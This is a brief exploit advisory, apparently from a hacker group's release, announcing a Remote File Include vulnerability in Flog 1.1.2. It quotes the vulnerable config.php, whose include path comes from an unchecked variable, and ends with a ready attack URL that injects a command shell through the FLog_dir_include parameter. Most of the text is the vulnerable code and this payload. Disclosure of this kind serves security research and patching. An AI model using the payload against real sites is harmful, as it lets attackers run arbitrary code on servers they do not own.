SaVSaK.CoM | SpC-x - The-BeKiR |

Flog 1.1.2 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : Flog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

<?php

$FLog_dir_plugins = 'plugins/';

$FLog_dir_data = 'data/';

$FLog_dir_themes = 'themes/';

$FLog_dir_include = 'include/';

$FLog_dir_files = 'files/';

require_once($FLog_dir_include.'core.inc.php');

?>

Vulnerable :

http://www.victim.com/Flog/config.php?FLog_dir_include=Command-Shell